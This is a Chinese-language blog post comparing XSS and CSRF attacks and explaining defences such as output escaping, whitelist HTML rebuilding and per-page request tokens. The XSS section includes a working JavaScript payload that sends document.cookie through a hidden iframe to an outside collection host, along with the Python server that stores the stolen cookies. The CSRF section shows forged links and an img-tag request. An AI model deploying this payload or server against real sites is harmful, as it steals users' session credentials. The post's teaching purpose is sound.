總結 XSS 與 CSRF 兩種跨站攻擊

lizhiqiang666發表於2018-12-06

在那個年代,大家一般用拼接字串的方式來構造動態 SQL 語句建立應用,於是 SQL 注入成了很流行的攻擊方式。在這個年代, 引數化查詢 [1] 已經成了普遍用法,我們已經離 SQL 注入很遠了。但是,歷史同樣悠久的 XSS 和 CSRF 卻沒有遠離我們。由於之前已經對 XSS 很熟悉了,所以我對使用者輸入的資料一直非常小心。如果輸入的時候沒有經過 Tidy 之類的過濾,我一定會在模板輸出時候全部轉義。所以個人感覺,要避免 XSS 也是很容易的,重點是要“小心”。但最近又聽說了另一種跨站攻擊 CSRF ,於是找了些資料瞭解了一下,並與 XSS 放在一起做個比較。
XSS:指令碼中的不速之客

XSS 全稱“跨站指令碼”,是注入攻擊的一種。其特點是不對伺服器端造成任何傷害,而是通過一些正常的站內互動途徑,例如釋出評論,提交含有 JavaScript 的內容文字。這時伺服器端如果沒有過濾或轉義掉這些指令碼,作為內容釋出到了頁面上,其他使用者訪問這個頁面的時候就會執行這些指令碼。

執行預期之外的指令碼帶來的後果有很多中,可能只是簡單的惡作劇——一個關不掉的視窗:

while (true) {
    alert("你關不掉我~");
}

也可以是盜號或者其他未授權的操作——我們來模擬一下這個過程,先建立一個用來收集資訊的伺服器:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
跨站指令碼注入的資訊收集伺服器
"""
import bottle

app = bottle.Bottle()
plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')
app.install(plugin)

@app.route('/myxss/')
def show(cookies, db):
    SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'
    try:
        db.execute(SQL, cookies)
    except:
        pass
    return ""

if __name__ == "__main__":
    app.run()

然後在某一個頁面的評論中注入這段程式碼:

// 用 包起來放在評論中

(function(window, document) {
    // 構造洩露資訊用的 URL
    var cookies = document.cookie;
    var xssURIBase = "http://192.168.123.123/myxss/";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // 建立隱藏 iframe 用於通訊
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // 開工
    document.body.appendChild(hideFrame);
})(window, document);

於是每個訪問到含有該評論的頁面的使用者都會遇到麻煩——他們不知道背後正悄悄的發起了一個請求,是他們所看不到的。而這個請求,會把包含了他們的帳號和其他隱私的資訊傳送到收集伺服器上。

我們知道 AJAX 技術所使用的 XMLHttpRequest 物件都被瀏覽器做了限制,只能訪問當前域名下的 URL,所謂不能“跨域”問題。這種做法的初衷也是防範 XSS,多多少少都起了一些作用,但不是總是有用,正如上面的注入程式碼,用 iframe 也一樣可以達到相同的目的。甚至在願意的情況下,我還能用 iframe 發起 POST 請求。當然,現在一些瀏覽器能夠很智慧地分析出部分 XSS 並予以攔截,例如新版的 Firefox、Chrome 都能這麼做。但攔截不總是能成功,何況這個世界上還有大量根本不知道什麼是瀏覽器的使用者在用著可怕的 IE6。從原則上將,我們也不應該把事關安全性的責任推脫給瀏覽器,所以防止 XSS 的根本之道還是過濾使用者輸入。使用者輸入總是不可信任的,這點對於 Web 開發者應該是常識。

正如上文所說,如果我們不需要使用者輸入 HTML 而只想讓他們輸入純文字,那麼把所有使用者輸入進行 HTML 轉義輸出是個不錯的做法。似乎很多 Web 開發框架、模版引擎的開發者也發現了這一點,Django 內建模版和 Jinja2 模版總是預設轉義輸出變數的。如果沒有使用它們,我們自己也可以這麼做。PHP 可以用 htmlspecialchars 函式,Python 可以匯入 cgi 模組用其中的 cgi.escape 函式。如果使用了某款模版引擎,那麼其必自帶了方便快捷的轉義方式。

真正麻煩的是,在一些場合我們要允許使用者輸入 HTML,又要過濾其中的指令碼。Tidy 等 HTML 清理庫可以幫忙,但前提是我們小心地使用。僅僅粗暴地去掉 script 標籤是沒有用的,任何一個合法 HTML 標籤都可以新增 onclick 一類的事件屬性來執行 JavaScript。對於複雜的情況,我個人更傾向於使用簡單的方法處理,簡單的方法就是白名單重新整理。使用者輸入的 HTML 可能擁有很複雜的結構,但我們並不將這些資料直接存入資料庫,而是使用 HTML 解析庫遍歷節點,獲取其中資料(之所以不使用 XML 解析庫是因為 HTML 要求有較強的容錯性)。然後根據使用者原有的標籤屬性,重新構建 HTML 元素樹。構建的過程中,所有的標籤、屬性都只從白名單中拿取。這樣可以確保萬無一失——如果使用者的某種複雜輸入不能為解析器所識別(前面說了 HTML 不同於 XML,要求有很強的容錯性),那麼它不會成為漏網之魚,因為白名單重新整理的策略會直接丟棄掉這些未能識別的部分。最後獲得的新 HTML 元素樹,我們可以拍胸脯保證——所有的標籤、屬性都來自白名單,一定不會遺漏。

現在看來,大多數 Web 開發者都瞭解 XSS 並知道如何防範,往往大型的 XSS 攻擊(包括前段時間新浪微博的 XSS 注入)都是由於疏漏。我個人建議在使用模版引擎的 Web 專案中,開啟(或不要關閉)類似 Django Template、Jinja2 中“預設轉義”(Auto Escape)的功能。在不需要轉義的場合,我們可以用類似 {{ myvar | raw }} 的方式取消轉義。這種白名單式的做法,有助於降低我們由於疏漏留下 XSS 漏洞的風險。

另外一個風險集中區域,是富 AJAX 類應用(例如豆瓣網的阿爾法城)。這類應用的風險並不集中在 HTTP 的靜態響應內容,所以不是開啟模版自動轉義能就能一勞永逸的。再加上這類應用往往需要跨域,開發者不得不自己開啟危險的大門。這種情況下,站點的安全非常依賴開發者的細心和應用上線前有效的測試。現在亦有不少開源的 XSS 漏洞測試軟體包(似乎有篇文章提到豆瓣網的開發也使用自動化 XSS 測試),但我都沒試用過,故不予評價。不管怎麼說,我認為從使用者輸入的地方把好關總是成本最低而又最有效的做法。

CSRF:冒充使用者之手

起初我一直弄不清楚 CSRF 究竟和 XSS 有什麼區別,後來才明白 CSRF 和 XSS 根本是兩個不同維度上的分類。XSS 是實現 CSRF 的諸多途徑中的一條,但絕對不是唯一的一條。一般習慣上把通過 XSS 來實現的 CSRF 稱為 XSRF。

CSRF 的全稱是“跨站請求偽造”,而 XSS 的全稱是“跨站指令碼”。看起來有點相似,它們都是屬於跨站攻擊——不攻擊伺服器端而攻擊正常訪問網站的使用者,但前面說了,它們的攻擊型別是不同維度上的分類。CSRF 顧名思義,是偽造請求,冒充使用者在站內的正常操作。我們知道,絕大多數網站是通過 cookie 等方式辨識使用者身份(包括使用伺服器端 Session 的網站,因為 Session ID 也是大多儲存在 cookie 裡面的),再予以授權的。所以要偽造使用者的正常操作,最好的方法是通過 XSS 或連結欺騙等途徑,讓使用者在本機(即擁有身份 cookie 的瀏覽器端)發起使用者所不知道的請求。

嚴格意義上來說,CSRF 不能分類為注入攻擊,因為 CSRF 的實現途徑遠遠不止 XSS 注入這一條。通過 XSS 來實現 CSRF 易如反掌,但對於設計不佳的網站,一條正常的連結都能造成 CSRF。

例如,一論壇網站的發貼是通過 GET 請求訪問,點選發貼之後 JS 把發貼內容拼接成目標 URL 並訪問: http://example.com/bbs/create_post.php?title=標題&content=內容 那麼,我只需要在論壇中發一帖,包含一連結: http://example.com/bbs/create_post.php?title=我是腦殘&content=哈哈 只要有使用者點選了這個連結,那麼他們的帳戶就會在不知情的情況下發布了這一帖子。可能這只是個惡作劇,但是既然發貼的請求可以偽造,那麼刪帖、轉帳、改密碼、發郵件全都可以偽造。

如何解決這個問題,我們是否可以效仿上文應對 XSS 的做法呢?過濾使用者輸入, 不允許釋出這種含有站內操作 URL 的連結。這麼做可能會有點用,但阻擋不了 CSRF,因為攻擊者可以通過 QQ 或其他網站把這個連結釋出上去,為了偽裝可能還使用 bit.ly 壓縮一下網址,這樣點選到這個連結的使用者還是一樣會中招。所以對待 CSRF ,我們的視角需要和對待 XSS 有所區別。CSRF 並不一定要有站內的輸入,因為它並不屬於注入攻擊,而是請求偽造。被偽造的請求可以是任何來源,而非一定是站內。所以我們唯有一條路可行,就是過濾請求的處理者。

比較頭痛的是,因為請求可以從任何一方發起,而發起請求的方式多種多樣,可以通過 iframe、ajax(這個不能跨域,得先 XSS)、Flash 內部發起請求(總是個大隱患)。由於幾乎沒有徹底杜絕 CSRF 的方式,我們一般的做法,是以各種方式提高攻擊的門檻。

首先可以提高的一個門檻,就是改良站內 API 的設計。對於釋出帖子這一類建立資源的操作,應該只接受 POST 請求,而 GET 請求應該只瀏覽而不改變伺服器端資源。當然,最理想的做法是使用REST 風格 [2] 的 API 設計,GET、POST、PUT、DELETE 四種請求方法對應資源的讀取、建立、修改、刪除。現在的瀏覽器基本不支援在表單中使用 PUT 和 DELETE 請求方法,我們可以使用 ajax 提交請求(例如通過 jquery-form 外掛,我最喜歡的做法),也可以使用隱藏域指定請求方法,然後用 POST 模擬 PUT 和 DELETE (Ruby on Rails 的做法)。這麼一來,不同的資源操作區分的非常清楚,我們把問題域縮小到了非 GET 型別的請求上——攻擊者已經不可能通過釋出連結來偽造請求了,但他們仍可以釋出表單,或者在其他站點上使用我們肉眼不可見的表單,在後臺用 js 操作,偽造請求。

接下來我們就可以用比較簡單也比較有效的方法來防禦 CSRF,這個方法就是“請求令牌”。讀過《J2EE 核心模式》的同學應該對“同步令牌”應該不會陌生,“請求令牌”和“同步令牌”原理是一樣的,只不過目的不同,後者是為了解決 POST 請求重複提交問題,前者是為了保證收到的請求一定來自預期的頁面。實現方法非常簡單,首先伺服器端要以某種策略生成隨機字串,作為令牌(token),儲存在 Session 裡。然後在發出請求的頁面,把該令牌以隱藏域一類的形式,與其他資訊一併發出。在接收請求的頁面,把接收到的資訊中的令牌與 Session 中的令牌比較,只有一致的時候才處理請求,否則返回 HTTP 403 拒絕請求或者要求使用者重新登入驗證身份。

請求令牌雖然使用起來簡單,但並非不可破解,使用不當會增加安全隱患。使用請求令牌來防止 CSRF 有以下幾點要注意:

雖然請求令牌原理和驗證碼有相似之處,但不應該像驗證碼一樣,全域性使用一個 Session Key。因為請求令牌的方法在理論上是可破解的,破解方式是解析來源頁面的文字,獲取令牌內容。如果全域性使用一個 Session Key,那麼危險係數會上升。原則上來說,每個頁面的請求令牌都應該放在獨立的 Session Key 中。我們在設計伺服器端的時候,可以稍加封裝,編寫一個令牌工具包,將頁面的標識作為 Session 中儲存令牌的鍵。
在 ajax 技術應用較多的場合,因為很有請求是 JavaScript 發起的,使用靜態的模版輸出令牌值或多或少有些不方便。但無論如何,請不要提供直接獲取令牌值的 API。這麼做無疑是鎖上了大門,卻又把鑰匙放在門口,讓我們的請求令牌退化為同步令牌。
第一點說了請求令牌理論上是可破解的,所以非常重要的場合,應該考慮使用驗證碼(令牌的一種升級,目前來看破解難度極大),或者要求使用者再次輸入密碼(亞馬遜、淘寶的做法)。但這兩種方式使用者體驗都不好,所以需要產品開發者權衡。
無論是普通的請求令牌還是驗證碼,伺服器端驗證過一定記得銷燬。忘記銷燬用過的令牌是個很低階但是殺傷力很大的錯誤。我們學校的選課系統就有這個問題,驗證碼用完並未銷燬,故只要獲取一次驗證碼圖片,其中的驗證碼可以在多次請求中使用(只要不再次重新整理驗證碼圖片),一直用到 Session 超時。這也是為何選課系統加了驗證碼,外掛軟體升級一次之後仍然暢通無阻。

如下也列出一些據說能有效防範 CSRF,其實效果甚微的方式甚至無效的做法。

通過 referer 判定來源頁面:referer 是在 HTTP Request Head 裡面的,也就是由請求的傳送者決定的。如果我喜歡,可以給 referer 任何值。當然這個做法並不是毫無作用,起碼可以防小白。但我覺得價效比不如令牌。
過濾所有使用者釋出的連結:這個是最無效的做法,因為首先攻擊者不一定要從站內發起請求(上面提到過了),而且就算從站內發起請求,途徑也遠遠不止連結一條。比如 <img src="./create_post.php" /> 就是個不錯的選擇,還不需要使用者去點選,只要使用者的瀏覽器會自動載入圖片,就會自動發起請求。
在請求發起頁面用 alert 彈窗提醒使用者:這個方法看上去能干擾站外通過 iframe 發起的 CSRF,但攻擊者也可以考慮用 window.alert = function(){}; 把 alert 弄啞,或者乾脆脫離 iframe,使用 Flash 來達到目的。

總體來說,目前防禦 CSRF 的諸多方法還沒幾個能徹底無解的。所以 CSDN 上看到討論 CSRF 的文章,一般都會含有“無恥”二字來形容(另一位有該名號的貌似是 DDOS 攻擊)。作為開發者,我們能做的就是儘量提高破解難度。當破解難度達到一定程度,網站就逼近於絕對安全的位置了(雖然不能到達)。上述請求令牌方法,就我認為是最有可擴充套件性的,因為其原理和 CSRF 原理是相剋的。CSRF 難以防禦之處就在於對伺服器端來說,偽造的請求和正常的請求本質上是一致的。而請求令牌的方法,則是揪出這種請求上的唯一區別——來源頁面不同。我們還可以做進一步的工作,例如讓頁面中 token 的 key 動態化,進一步提高攻擊者的門檻。本文只是我個人認識的一個總結,便不討論過深了。

相關文章